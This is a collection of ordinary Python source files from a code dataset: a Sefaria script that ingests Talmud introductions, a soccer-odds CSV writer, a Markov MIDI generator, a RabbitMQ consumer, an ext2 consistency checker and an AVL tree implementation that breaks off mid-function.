'הקדמה ל'\n\n if \" Perek \" in title:\n hebrew_title += 'פרק '\n hebrew_title += latin_numeral_to_hebrew_numeral(title.split(' ')[3].strip())\n return hebrew_title\n\n else:\n hebrew_title += \"מסכת \"\n hebrew_title += masechet_hebrew\n return hebrew_title\n\n if 'Summary of' in title:\n hebrew_title += 'סיכום לפרק '\n numeral = title.split(' ')[3].strip()\n hebrew_title += latin_numeral_to_hebrew_numeral(numeral)\n return hebrew_title\n\n\ndef parse_csv_to_object():\n list_of_dicts = []\n # structure:\n [{'ref': ...,\n 'english_text': [],\n 'hebrew_text': [],\n 'masechet': ...,\n 'masechet_hebrew': ...,\n 'title': 'Introduction to Berakhot',\n 'title_hebrew': ''}]\n with open('introductions.csv', newline='') as csvfile:\n r = csv.reader(csvfile, delimiter=',')\n\n current_ref_dict = {}\n for row in r:\n ref = row[0]\n if ref != '':\n current_ref_dict = {}\n current_ref_dict[\"ref\"] = ref\n current_ref_dict['english_text'] = []\n current_ref_dict['english_text'].append(row[1])\n current_ref_dict['hebrew_text'] = []\n current_ref_dict['hebrew_text'].append(row[2])\n\n ##########################\n # getting titles and mesechtot:\n\n ref_parts = ref.split(',')\n\n masechet = ref_parts[1].strip()\n masechet_hebrew = Ref(masechet).he_normal()\n\n title = ref_parts[2].strip()\n title_hebrew = translate_title_to_hebrew(title, masechet_hebrew)\n\n current_ref_dict[\"masechet\"] = masechet\n current_ref_dict[\"masechet_hebrew\"] = masechet_hebrew\n current_ref_dict[\"title\"] = title\n current_ref_dict[\"title_hebrew\"] = title_hebrew\n if len(current_ref_dict[\"english_text\"]) == 1:\n list_of_dicts.append(current_ref_dict)\n else:\n current_ref_dict['english_text'].append(row[1])\n current_ref_dict['hebrew_text'].append(row[2])\n\n return (list_of_dicts)\n\n\ndef get_list_of_masechtot_nodes(list_of_masechtot, starting_masechet_name):\n found_starting_masechet_flag = False\n # index = library.get_index(\"Introductions to the Babylonian Talmud\")\n # parent = index.nodes\n nodes_list = []\n current_masechet = \"no masechet yet\"\n for segment_dict in list_of_masechtot:\n if (segment_dict['masechet'] == starting_masechet_name) or found_starting_masechet_flag:\n found_starting_masechet_flag = True\n if segment_dict['masechet'] != current_masechet:\n masechet_node = SchemaNode()\n masechet_node.key = segment_dict[\"masechet\"] # should be equal to primary title\n masechet_node.add_primary_titles(segment_dict[\"masechet\"], segment_dict[\"masechet_hebrew\"])\n\n leaf_node = JaggedArrayNode()\n leaf_node.add_primary_titles(segment_dict[\"title\"], segment_dict[\"title_hebrew\"])\n leaf_node.add_structure([\"Paragraph\"])\n masechet_node.append(leaf_node)\n if segment_dict['masechet'] != current_masechet:\n nodes_list.append(masechet_node)\n current_masechet = segment_dict['masechet']\n # insert_last_child(masechet_node, parent)\n return nodes_list\n\n\ndef list_of_masechtot_to_db(nodes_list):\n ####dangerous way to add new nodes:\n # index = library.get_index(\"Introductions to the Babylonian Talmud\")\n # parent = index.nodes\n # for node in nodes_list:\n # insert_last_child(node, parent)\n for node in nodes_list:\n index = library.get_index(\"Introductions to the Babylonian Talmud\")\n parent = index.nodes\n insert_last_child(node, parent)\n print(\"finished updating index db\")\n\n\ndef object_to_dict_of_refs(csv_parsed_object, language):\n refs_dict = {}\n text_language = \"\"\n if language == \"english\":\n text_language = \"english_text\"\n if language == \"hebrew\":\n text_language = \"hebrew_text\"\n\n for chapter in csv_parsed_object:\n paragraph_num = 1\n for paragraph in chapter[text_language]:\n ref = chapter[\"ref\"] + \" \" + str(paragraph_num)\n refs_dict[ref] = paragraph\n ##refs_dict[ref] = \":)\"\n paragraph_num += 1\n return refs_dict\n\n\ndef ingest_english_version():\n vs = VersionState(index=library.get_index(\"Introductions to the Babylonian Talmud\"))\n vs.delete()\n print(\"deleted version state\")\n index = library.get_index(\"Introductions to the Babylonian Talmud\")\n\n chapter = index.nodes.create_skeleton()\n english_version = Version({\"versionTitle\": \"William Davidson Edition - English\",\n \"versionSource\": \"'https://korenpub.com/collections/the-noe-edition-koren-talmud-bavli-1'\",\n \"title\": \"Introductions to the Babylonian Talmud\",\n \"chapter\": chapter,\n \"language\": \"en\",\n \"digitizedBySefaria\": True,\n \"license\": \"CC-BY-NC\",\n \"status\": \"locked\"\n })\n\n version_text_map_english = object_to_dict_of_refs(csv_object, \"english\")\n modify_bulk_text(superuser_id, english_version, version_text_map_english)\n\n print(\"finished updating English version db\")\n\n\ndef ingest_hebrew_version():\n vs = VersionState(index=library.get_index(\"Introductions to the Babylonian Talmud\"))\n vs.delete()\n print(\"deleted version state\")\n index = library.get_index(\"Introductions to the Babylonian Talmud\")\n chapter = index.nodes.create_skeleton()\n hebrew_version = Version({\"versionTitle\": \"William Davidson Edition - Hebrew\",\n \"versionSource\": \"'https://korenpub.com/collections/the-noe-edition-koren-talmud-bavli-1'\",\n \"title\": \"Introductions to the Babylonian Talmud\",\n \"chapter\": chapter,\n \"language\": \"he\",\n \"digitizedBySefaria\": True,\n \"license\": \"CC-BY-NC\",\n \"status\": \"locked\"\n })\n version_text_map_hebrew = object_to_dict_of_refs(csv_object, \"hebrew\")\n modify_bulk_text(superuser_id, hebrew_version, version_text_map_hebrew)\n print(\"finished updating Hebrew version db\")\n\n\ndef delete_all_existing_versions():\n cur_version = VersionSet({'title': 'Introductions to the Babylonian Talmud',\n 'versionTitle': \"William Davidson Edition - Hebrew\"})\n if cur_version.count() > 0:\n cur_version.delete()\n print(\"deleted existing hebrew version\")\n\n cur_version = VersionSet({'title': 'Introductions to the Babylonian Talmud',\n 'versionTitle': \"William Davidson Edition - English\"})\n if cur_version.count() > 0:\n cur_version.delete()\n print(\"deleted existing english version\")\n\n\ndef reorder_masechet_nodes():\n masechtot_keys_ordered = [\"Berakhot\", \"Shabbat\", \"Eruvin\", \"Pesachim\", \"Rosh Hashanah\", \"Yoma\", \"Sukkah\", \"Beitzah\",\n \"Taanit\", \"Megillah\", \"Moed Katan\", \"Chagigah\",\n \"Yevamot\", \"Ketubot\", \"Nedarim\", \"Nazir\", \"Sotah\", \"Gittin\", \"Kiddushin\",\n \"Bava Kamma\", \"Bava Metzia\", \"Bava Batra\", \"Sanhedrin\", \"Makkot\", \"Shevuot\",\n \"Avodah Zarah\", \"Horayot\",\n \"Zevachim\", \"Menachot\", \"Chullin\", \"Bekhorot\", \"Arakhin\", \"Temurah\", \"Keritot\", \"Meilah\",\n \"Tamid\", \"Niddah\"]\n index = library.get_index(\"Introductions to the Babylonian Talmud\")\n reorder_children(index.nodes, masechtot_keys_ordered)\n print(\"finished re-ordering\")\n\n\ndef roman_to_int(s):\n rom_val = {'I': 1, 'V': 5, 'X': 10, 'L': 50, 'C': 100, 'D': 500, 'M': 1000}\n int_val = 0\n for i in range(len(s)):\n if i > 0 and rom_val[s[i]] > rom_val[s[i - 1]]:\n int_val += rom_val[s[i]] - 2 * rom_val[s[i - 1]]\n else:\n int_val += rom_val[s[i]]\n return int_val\n\n\ndef create_links(csv_object):\n links = []\n for ref_dict in csv_object:\n raw_ref = ref_dict['ref']\n if \"Perek\" in raw_ref:\n # exact_ref = library.get_index('Berakhot').get_alt_structs['Perek'][0]['wholeRef']\n chapter_num = roman_to_int(raw_ref.split(\"Perek\", 1)[1].strip())\n exact_ref = Ref(ref_dict[\"masechet\"] + \", Chapter \" + str(chapter_num)).normal()\n # text_display_en = ref_dict[\"masechet\"] + \", Chapter \" + str(chapter_num)\n # text_display_he = ref_dict[\"masechet_hebrew\"] + \", פרק \" + str(chapter_num)\n\n\n else:\n exact_ref = str(Ref(ref_dict[\"masechet\"]).as_ranged_segment_ref())\n # text_display_en = ref_dict[\"masechet\"]\n # text_display_he = ref_dict[\"masechet_hebrew\"]\n\n new_link_dict = {\n \"refs\": [ref_dict['ref'], exact_ref], #[ref_dict['ref'], exact_ref], [ref_dict['ref'], \"Berakhot 2a:1\"]\n \"type\": \"essay\",\n \"versions\": [\n {\n \"title\": \"NONE\", \"language\": \"en\" # \"title\": \"ALL\", \"language\": \"en\" \"title\": \"NONE\", \"language\": \"en\"\n },\n {\n \"title\": \"ALL\", \"language\": \"ALL\"\n }\n ],\n \"displayedText\": [\n {\n \"en\": ref_dict[\"title\"], # raw_ref.split(\"Talmud,\", 1)[1].strip(),\n \"he\": ref_dict[\"title_hebrew\"] # raw_ref.split(\"Talmud,\", 1)[1].strip()\n },\n {\n \"en\": \"\",\n \"he\": \"\"\n }\n ]\n\n }\n new_link = Link(new_link_dict)\n\n links.append(new_link)\n\n return (links)\n\n # refs: list with two trefs\n # type: \"essay\"\n # versions: list with version titles\n # displayedText: list with displayed text\n #\n\n\ndef delete_existing_links(query={\"generated_by\": \"Koren Intro Parse Script\"}):\n list_of_links = LinkSet(query).array()\n for l in list_of_links:\n l.delete()\n\ndef delete_existing_koren_links(query={\"generated_by\": \"Koren Intro Parse Script\"}):\n list_of_links = LinkSet(query).array()\n for l in list_of_links:\n l.delete()\n\ndef delete_existing_automated_links(query={\"type\": \"\", \"refs\": {\"$regex\" : \"Introductions to the Babylonian Talmud\"}}):\n list_of_links = LinkSet(query).array()\n for l in list_of_links:\n if Ref(l.refs[0]).is_bavli():\n l.delete()\n\ndef delete_existing_correct_essay_links(query={\"type\":\"essay\", \"refs\": {\"$regex\" : \"Introductions to the Babylonian Talmud\"}}):\n list_of_links = LinkSet(query).array()\n for l in list_of_links:\n l.delete()\n\ndef insert_links_to_db(list_of_links):\n for l in list_of_links:\n l.save()\n\n\n\n # m = library._index_map\n # index = library.get_index(\"Introductions to the Babylonian Talmud\")\n\n # english_version = Version().load({\"title\": \"Introductions to the Babylonian Talmud\", \"versionTitle\": \"William Davidson Edition - English\"})\n\n # hebrew_version = Version().load(\n # {\"title\": \"Introductions to the Babylonian Talmud\", \"versionTitle\": \"William Davidson Edition - Hebrew\"})\n # with open(\"introductions_to_the_babylonian_talmud_index.json\") as f:\n # new_index = json.load(f)\n #\n # db.index.insert_one(new_index)\n # index = library.get_index(\"Introductions to the Babylonian Talmud\")\n\n\nif __name__ == '__main__':\n print(\"hello world\")\n\n\n\n superuser_id = 171118\n\n\n\n csv_object = parse_csv_to_object()\n\n\n # index_nodes = get_list_of_masechtot_nodes(csv_object, \"Sanhedrin\")\n # list_of_masechtot_to_db(index_nodes)\n # time.sleep(5)\n # delete_all_existing_versions()\n\n ingest_english_version()\n time.sleep(5)\n ingest_hebrew_version()\n\n\n reorder_masechet_nodes()\n\n\n\n delete_existing_correct_essay_links()\n delete_existing_koren_links()\n delete_existing_automated_links()\n list_of_links = create_links(csv_object)\n insert_links_to_db(list_of_links)\n","sub_path":"sources/steinsaltz_intros_talmud/steinsaltz_intros_add_nodes.py","file_name":"steinsaltz_intros_add_nodes.py","file_ext":"py","file_size_in_byte":14622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"239737429","text":"\"\"\"\nManager class to handle csv file storage of scraped data\n\"\"\"\nimport csv\n\nCSV_FILENAME = \"oddsportal.csv\"\n\n\nclass CSVFileMangager:\n def __init__(self):\n \"\"\"\n initialize csv_file writer\n \"\"\"\n\n self.csv_file = open(CSV_FILENAME, mode='w')\n self.csv_file_writer = csv.writer(self.csv_file, delimiter=',')\n\n\n def add_soccer_match(self, league, retrieved_from_url, match):\n \"\"\"\n Insert a soccer match entry into the database.\n\n Args:\n league (dict): The dict result from parsing a league.json file.\n\n retrieved_from_url (str): URL this match was retrieved from.\n\n match (object): The SoccerMatch to insert into the database.\n \"\"\"\n\n # write row into csv file\n self.csv_file_writer.writerow([\n league[\"league\"],\n league[\"area\"],\n retrieved_from_url,\n str(match.get_start_time_unix_int()),\n str(match.get_end_time_unix_int()),\n match.get_team1_string(),\n match.get_team2_string(),\n match.get_outcome_string(),\n str(match.get_team1_odds()),\n str(match.get_team2_odds()),\n str(match.get_draw_odds()),\n str(match.get_team1_score()),\n str(match.get_team2_score())\n\n\n ])\n\n def __del__(self):\n \"\"\"\n Destructor.\n \"\"\"\n\n self.csv_file.close()\n\n\n\n","sub_path":"soccer_to_sql/CSVManager.py","file_name":"CSVManager.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"382872992","text":"import pickle\r\nimport random\r\nfrom EasyMIDI import EasyMIDI, Track, Note\r\nimport sys\r\n\r\ninit_symbols = pickle.load( open( sys.argv[1] + '/init_symbols.p', \"rb\" ) )\r\nsymbol_transition_count = pickle.load( open( sys.argv[1] + '/symbol_transition_count.p', \"rb\" ) )\r\n\r\ninitial_state = tuple(random.choice(init_symbols))\r\nsequence = [initial_state]\r\nfor i in range( int(sys.argv[3])):\r\n if sequence[-1] not in symbol_transition_count:\r\n break\r\n\r\n transitions = symbol_transition_count[sequence[-1]]\r\n weights = list(transitions.values())\r\n states = list(transitions.keys())\r\n current_state = random.choices(states, weights = weights)[0]\r\n sequence.append(current_state)\r\n\r\nn_tracks = len(sequence[0]) - 1\r\ntracks = [[] for i in range(n_tracks)]\r\nfor state in sequence:\r\n for i in range(n_tracks):\r\n pitch = state[i]\r\n duration = state[-1]\r\n if pitch > 0:\r\n tracks[i].append([pitch, duration])\r\n else:\r\n tracks[i][-1][1] += duration\r\n\r\nnotes = ['C', 'C#', 'D', 'Eb', 'E', 'F', 'F#', 'G', 'Ab', 'A', 'Bb', 'B']\r\n\r\neasyMIDI = EasyMIDI()\r\n\r\nfor voice in tracks:\r\n track = Track(\"choir aahs\")\r\n for note in voice:\r\n pitch = note[0]\r\n duration = note[1]\r\n midi_note = Note(notes[pitch%12], octave = pitch//12 - 1, duration = duration/4, volume = 100)\r\n track.addNote(midi_note)\r\n\r\n easyMIDI.addTrack(track)\r\n\r\neasyMIDI.writeMIDI(sys.argv[2])","sub_path":"sequence_generator.py","file_name":"sequence_generator.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"454007104","text":"from django.urls import path\nfrom . import views\n\n# Add a namespace to differentiate names of views between different apps\n#app_name = 'sys'\n\nurlpatterns = [\n path('available', views.available, name='available'),\n path('reserve', views.reserve, name='reserve'),\n path('end_reservation', views.end_reservation, name='end_reservation'),\n]\n","sub_path":"scooters/system/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"575240789","text":"#! /usr/bin/env python\n\nfrom __future__ import print_function\nimport csv\nimport sys\nimport os\n\ncsvfile = \"\"\nsuperblock = None\ngroup = None\nfreeBlocks = set()\nallocatedBlocks = set()\nduplicateBlocks = dict()\nfreeInodes = set()\ninodes = []\ndirEntries = []\nindirects = []\nexit_code = 0\n\n\nclass Superblock:\n def __init__(self, arg):\n self.blockCount = int(arg[1])\n self.inodeCount = int(arg[2])\n self.blockSize = int(arg[3])\n self.inodeSize = int(arg[4])\n self.blocksPG = int(arg[5])\n self.inodesPG = int(arg[6])\n self.firstNonReserved = int(arg[7])\n\nclass Group:\n def __init__(self, arg):\n self.numberBlocks = int(arg[2])\n self.numberInodes = int(arg[3])\n self.freeBlocks = int(arg[4])\n self.freeInodes = int(arg[5])\n self.bitmap = int(arg[6])\n self.inodemap = int(arg[7])\n self.firstInode = int(arg[8])\n\nclass DirectoryElement:\n def __init__(self, arg):\n self.parentInum = int (arg[1])\n self.fileInum = int (arg[3])\n self.lenOfElement = int (arg[4])\n self.lenOfName = int (arg [5])\n self.fileName = arg[6]\n\nclass Inode:\n def __init__(self, arg):\n self.inodeNumber = int(arg[1])\n self.fileType = arg[2]\n self.owner = int(arg[4])\n self.group = int(arg[5])\n self.linkCount = int(arg[6])\n self.fileSize = int(arg[10])\n self.numberBlocks = int(arg[11])\n self.blockAddresses = list()\n for x in range(12, 27):\n self.blockAddresses.append(int(arg[x]))\n allocatedBlocks.add(int(arg[x]))\n \nclass Indirect:\n def __init__(self, arg):\n self.inodeNumber = int(arg[1])\n self.levelIndirection = int(arg[2])\n self.offset = int(arg[3])\n self.blockNumberIndirect = int(arg[4])\n blockNumber = int(arg[5])\n self.blockNumberReferenced = blockNumber\n global allocatedBlocks\n global duplicateBlocks\n allocatedBlocks.add(blockNumber)\n if blockNumber not in duplicateBlocks:\n duplicateBlocks[blockNumber] = list()\n duplicateBlocks[blockNumber].append((self.inodeNumber, self.offset)) #not sure what offset to use\n\ndef checkBlockConsistency():\n global superblock\n global duplicateBlocks\n global allocatedBlocks\n global freeBlocks\n #examine every block pointer in every single inode, directory block, indirect block, double indirect block, triple indirect block\n for inode in inodes: #first check invalid and reserved blocks by examining block pointers in inode\n i = 1\n for pointer in inode.blockAddresses:\n if(pointer < 0 or pointer > superblock.blockCount): #check invalid\n if i <= 12:\n print (\"INVALID BLOCK %d IN INODE %d AT OFFSET 0\" %(pointer,inode.inodeNumber))\n elif i == 13:\n print (\"INVALID INDIRECT BLOCK %d IN INODE %d AT OFFSET 12\" %(pointer,inode.inodeNumber))\n elif i == 14:\n print (\"INVALID DOUBLE INDIRECT BLOCK %d IN INODE %d AT OFFSET 268\" %(pointer,inode.inodeNumber))\n elif i == 15:\n print (\"INVALID TRIPLE INDIRECT BLOCK %d IN INODE %d AT OFFSET 65804\" %(pointer,inode.inodeNumber))\n elif(pointer < 8 and pointer != 0): #check reserved #why???\n if i <= 12:\n print (\"RESERVED BLOCK %d IN INODE %d AT OFFSET 0\" %(pointer,inode.inodeNumber))\n elif i == 13:\n print (\"RESERVED INDIRECT BLOCK %d IN INODE %d AT OFFSET 12\" %(pointer,inode.inodeNumber))\n elif i == 14:\n print (\"RESERVED DOUBLE INDIRECT BLOCK %d IN INODE %d AT OFFSET 268\" %(pointer,inode.inodeNumber))\n elif i == 15:\n print (\"RESERVED TRIPLE INDIRECT BLOCK %d IN INODE %d AT OFFSET 65804\" %(pointer,inode.inodeNumber))\n if pointer not in duplicateBlocks:\n duplicateBlocks[pointer] = list()\n if i <= 12:\n duplicateBlocks[pointer].append((inode.inodeNumber, 0))\n elif i == 13:\n duplicateBlocks[pointer].append((inode.inodeNumber, 12))\n elif i == 14:\n duplicateBlocks[pointer].append((inode.inodeNumber, 268))\n elif i == 15:\n duplicateBlocks[pointer].append((inode.inodeNumber, 65804))\n i += 1 \n for i in range(8, superblock.blockCount):\n if i not in freeBlocks and i not in allocatedBlocks:\n print (\"UNREFERENCED BLOCK %d\" %(i))\n for block in allocatedBlocks:\n if block in freeBlocks and block in range(8, superblock.blockCount):\n print(\"ALLOCATED BLOCK %d ON FREELIST\" %(block))\n for key, value in duplicateBlocks.items():\n if (len(value) > 1) and (key in range(8,superblock.blockCount)):\n for duplicate in value:\n if (int(duplicate[1])) >= 65804:\n print(\"DUPLICATE TRIPLE INDIRECT BLOCK %d IN INODE %d AT OFFSET %d\" %(key, duplicate[0], duplicate[1]))\n elif (int(duplicate[1])) >= 268:\n print(\"DUPLICATE DOUBLE INDIRECT BLOCK %d IN INODE %d AT OFFSET %d\" %(key, duplicate[0], duplicate[1]))\n elif (int(duplicate[1])) >= 12:\n print(\"DUPLICATE INDIRECT BLOCK %d IN INODE %d AT OFFSET %d\" %(key, duplicate[0], duplicate[1]))\n else:\n print(\"DUPLICATE BLOCK %d IN INODE %d AT OFFSET %d\" %(key, duplicate[0], duplicate[1]))\n\n\ndef checknodeAlloc():\n global superblock\n global exit_code\n \n cnt_inode = superblock.inodeCount\n \n for i in range(0, cnt_inode):\n if i != 2:\n if i < 11:\n continue\n \n al_fl = False\n fr_fl = False\n \n for inode in inodes:\n if inode.inodeNumber == i:\n al_fl = True\n break\n\n if i in freeInodes:\n fr_fl = True\n \n if al_fl == fr_fl:\n if fr_fl:\n print(\"ALLOCATED INODE %d ON FREELIST\" % (i))\n exit_code = 1\n else:\n print(\"UNALLOCATED INODE %d NOT ON FREELIST\" % (i))\n exit_code = 1\n\n\ndef DirectoryConsistencyAuditing():\n global superblock\n global exit_code\n \n cnt_inode = superblock.inodeCount\n holder = {}\n \n for inode in inodes:\n cnt_links = 0\n \n for directory in dirEntries:\n \n if inode.inodeNumber == directory.fileInum:\n cnt_links = 1 + cnt_links\n\n elif inode.inodeNumber == directory.parentInum and (directory.fileInum > cnt_inode or directory.fileInum < 1):\n print(\"DIRECTORY INODE %d NAME %s INVALID INODE %d\" %(directory.parentInum, directory.fileName, directory.fileInum))\n exit_code = 1\n\n elif inode.inodeNumber == directory.parentInum and not any(i.inodeNumber == directory.fileInum for i in inodes):\n print(\"DIRECTORY INODE %d NAME %s UNALLOCATED INODE %d\" %(directory.parentInum, directory.fileName, directory.fileInum))\n exit_code = 1\n \n if directory.parentInum == 2:\n holder[directory.fileInum] = directory.parentInum\n \n \n if cnt_links != inode.linkCount:\n print(\"INODE %d HAS %d LINKS BUT LINKCOUNT IS %d\" % (inode.inodeNumber, cnt_links, inode.linkCount))\n exit_code = 1\n\n for directory in dirEntries:\n if directory.fileInum != directory.parentInum and directory.fileName == \"'.'\":\n print(\"DIRECTORY INODE %d NAME '.' LINK TO INODE %d SHOULD BE %d\" %(directory.parentInum, directory.fileInum, directory.parentInum))\n exit_code = 1\n elif directory.fileInum != holder[directory.parentInum] and directory.fileName == \"'..'\":\n print(\"DIRECTORY INODE %d NAME '..' LINK TO INODE %d SHOULD BE %d\" %(directory.parentInum, directory.fileInum, holder[directory.parentInum]))\n exit_code = 1\n \n\n\ndef main():\n if (len(sys.argv) != 2):\n sys.stderr.write(\"Usage: Require one argument - a csv file\")\n exit(1)\n global csvfile\n csvfile = sys.argv[1]\n with open(csvfile, 'rb') as opencsvfile:\n reader = csv.reader(opencsvfile)\n try:\n for row in reader: #basically storing all the information from the csv file\n if row[0] == \"SUPERBLOCK\":\n global superblock \n superblock = Superblock(row)\n elif row[0] == \"GROUP\":\n global group\n group = Group(row)\n elif row[0] == \"BFREE\":\n global freeBlocks\n freeBlocks.add(int(row[1]))\n elif row[0] == \"IFREE\":\n global freeInodes\n freeInodes.add(int(row[1]))\n elif row[0] == \"INODE\":\n global inodes\n inodes.append(Inode(row))\n elif row[0] == \"DIRENT\":\n global dirEntries\n dirEntries.append(DirectoryElement(row))\n elif row[0] == \"INDIRECT\":\n global indirects\n indirects.append(Indirect(row))\n except csv.Error as e:\n sys.exit('file %s, line %d: %s' % (csvfile, reader.line_num, e))\n checkBlockConsistency()\n checknodeAlloc()\n DirectoryConsistencyAuditing()\n\n\nif __name__==\"__main__\":\n main()\n if exit_code == 0:\n exit(0)\n else:\n exit(2)\n\n \n\n","sub_path":"lab3b/lab3b.py","file_name":"lab3b.py","file_ext":"py","file_size_in_byte":9656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"107249178","text":"import json\n\nfrom krk_meetings.exchanges import Exchange\nfrom krk_meetings.rabbitmq.RmqHelper import RmqHelper\n\n\nclass RmqConsumer(RmqHelper):\n def __init__(self, exchange: Exchange, callback_function):\n super().__init__(exchange)\n self.function = callback_function\n\n if self.exchange.type:\n self.channel.exchange_declare(exchange=self.exchange.name, exchange_type=self.exchange.type)\n else:\n self.channel.exchange_declare(exchange=self.exchange.name)\n queue_name = f\"{self.exchange.queue}_{str(id(self))}\" if self.exchange.separate_instances else self.exchange.queue\n result = self.channel.queue_declare(queue=queue_name)\n self.queue = result.method.queue\n\n self.channel.queue_bind(exchange=self.exchange.name, routing_key=self.exchange.key, queue=self.queue)\n\n def start(self):\n self.channel.basic_consume(queue=self.queue, on_message_callback=self.callback, auto_ack=False)\n self.channel.start_consuming()\n\n def callback(self, ch, method, properties, body):\n if self.is_heartbeat(json.loads(body)):\n ch.basic_ack(delivery_tag=method.delivery_tag)\n return\n self.function(self.exchange.from_json(body))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n\n\n","sub_path":"backend/krk_meetings/rabbitmq/RmqConsumer.py","file_name":"RmqConsumer.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"238828073","text":"import os\r\nimport jieba\r\nimport pickle\r\nfrom wordcloud import WordCloud, STOPWORDS, ImageColorGenerator\r\nimport matplotlib.pyplot as plt\r\n\r\ntext_path = os.getcwd() + \"/lrc.txt\"\r\nword_path = os.getcwd() + \"/lrc_word.txt\"\r\nimg_path = os.getcwd() + \"/lrc.jpg\"\r\n\r\n# text = ''\r\n#\r\n# with open(text_path, 'r', encoding='utf8') as fin:\r\n# for line in fin.readlines():\r\n# line = line.strip('\\n')\r\n# text += ' '.join(jieba.cut(line))\r\n# text += ' '\r\n# fout = open(os.getcwd() + \"/lrc_word.txt\", 'wb')\r\n# pickle.dump(text, fout)\r\n# fout.close()\r\n\r\nfr = open(word_path, 'rb')\r\ntext = pickle.load(fr)\r\n\r\nwc = WordCloud(background_color='white', # 设置背景颜色\r\n max_words=2000, # 设置最大现实的字数\r\n stopwords=['作词', '作曲'],\r\n font_path='‪C:\\Windows\\Fonts\\msyh.ttc', # 设置字体格式,如不设置显示不了中文\r\n max_font_size=50, # 设置字体最大值\r\n random_state=30, # 设置有多少种随机生成状态,即有多少种配色方案\r\n )\r\nwc.generate(text)\r\n\r\nwc.to_file(img_path)\r\n","sub_path":"practices/music163_spider/word_cloud.py","file_name":"word_cloud.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"349729527","text":"# Arvore AVL\nfrom utils import *\n\n\nclass AVLNode(object):\n def __init__(self, key, data, occ):\n self.key = key\n self.data = data\n self.occ = occ\n self.left = None\n self.right = None\n self.height = int(1)\n\n\nclass AVLTree(object):\n\n def createnode(self, key, data, occ):\n return AVLNode(key, data, occ)\n\n def getheight(self, root):\n if not root:\n return 0\n return root.height\n\n def rightRotate(self, k2):\n k1 = k2.left\n k2.left = k1.right\n k1.right = k2\n k2.height = 1 + max(self.getheight(k2.left), self.getheight(k2.right))\n k1.height = 1 + max(self.getheight(k1.left), self.getheight(k1.right))\n return k1\n\n def leftRotate(self, k2):\n k1 = k2.right\n k2.right = k1.left\n k1.left = k2\n k2.height = 1 + max(self.getheight(k2.left), self.getheight(k2.right))\n k1.height = 1 + max(self.getheight(k1.left), self.getheight(k1.right))\n return k1\n\n def doubleRight(self, k3):\n k3.left = self.leftRotate(k3.left)\n return self.rightRotate(k3)\n\n def doubleLeft(self, k3):\n k3.right = self.rightRotate(k3.right)\n return self.leftRotate(k3)\n\n def search(self, tree, dat):\n found = False\n\n key = ordstring(dat)\n if tree is None and not found:\n print(\"chave não encontrada, adicionando à árvore...\\n\")\n return False\n\n if tree.key == key and tree.data == dat:\n found = True\n print(\"chave está na árvore\\n\")\n tree.occ += 1\n return True\n elif key < tree.key:\n return self.search(tree.left, dat)\n elif key > tree.key:\n return self.search(tree.right, dat)\n\n def insert(self, root, data, occ):\n key = ordstring(data)\n # passo 1 inserção basica de arvore binaria de busca\n if not root:\n return AVLNode(key, data, occ)\n elif key < root.key:\n root.left = self.insert(root.left, data, occ)\n else:\n root.right = self.insert(root.right, data, occ)\n # passo 2 atualizando a altura do nó anterior\n root.height = 1 + max(self.getheight(root.left), self.getheight(root.right))\n # passo 3 determinando o balanceamento\n balance = self.getbalance(root)\n # passo 4 se o nó está desbalanceado\n # caso 1: esquerda esquerda\n if balance > 1 and key < root.left.key:\n return self.rightRotate(root)\n # caso 2: dir dir\n if balance < -1 and key > root.right.key:\n return self.leftRotate(root)\n # caso 3: esq dir\n if balance > 1 and key > root.left.key:\n return self.doubleRight(root)\n # caso 4: dir esq\n if balance < -1 and key < root.right.key:\n return self.doubleLeft(root)\n\n return root\n\n def delete(self, root, data):\n key = ordstring(data)\n # passo 1 remoção em arvore binaria de busca\n if not root:\n return root\n elif key < root.key:\n root.left = self.delete(root.left, data)\n elif key > root.key:\n root.right = self.delete(root.right, data)\n else:\n if key == root.key and root.data == data:\n if root.left is None:\n aux = root.right\n root = None\n return aux\n elif root.right is None:\n aux = root.left\n root = None\n return aux\n\n aux = self.getminkeynode(root.right)\n root.data = aux.data\n root.right = self.delete(root.right, aux.data)\n\n # se a arvore só tem a raiz\n\n if root is None:\n return root\n\n # passo 2 atualizar a altura do nodo antecessor\n\n root.height = 1 + max(self.getheight(root.left), self.getheight(root.right))\n\n # passo 3 pegar o fator de balanciamento\n\n balance = self.getbalance(root)\n\n # passo 4 se o nodo está balanceado\n # testar os 4 casos\n\n # caso 1 - desbalanceada à esquerda > rotação simples à direita\n if int(balance) > 1 and self.getbalance(root.left) >= 0:\n return self.rightRotate(root)\n # caso 2 - desbalanceada à direita > rotação simples à esquerda\n if int(balance) < -1 and self.getbalance(root.right) <= 0:\n return self.leftRotate(root)\n # caso 3 - rotação dupla à direita\n if int(balance) > 1 and self.getbalance(root.left) < 0:\n return self.doubleRight(root)\n # caso 4 - rotação dupla à esquerda\n if int(balance) < -1 and self.getbalance(root.right) > 0:\n return self.doubleLeft(root)\n\n return root\n\n def getminkeynode(self, root):\n if root is None or root.left is None:\n return root\n\n return self.getminkeynode(root.left)\n\n def balance(self, root):\n if not root:\n return 0\n return int(self.getheight(root.left) - self.getheight(root.right))\n\n def getbalance(self, root):\n if not root:\n return 0\n return int(self.getheight(root.left) - self.getheight(root.right))\n\n def preorder(self, root):\n if not root:\n return\n print(\"{0} \".format(root.key), \"{0} \".format(root.data), end=\"\")\n self.preorder(root.left)\n self.preorder(root.right)\n\n def inorder(self, root):\n if not root:\n return\n self.preorder(root.left)\n print(\"{0} \".format(root.key), \"{0} \".format(root.data), end=\"\")\n self.preorder(root.right)\n\n def posorder(self, root):\n if not root:\n return\n self.preorder(root.left)\n self.preorder(root.right)\n print(\"{0} \".format(root.key), \"{0} 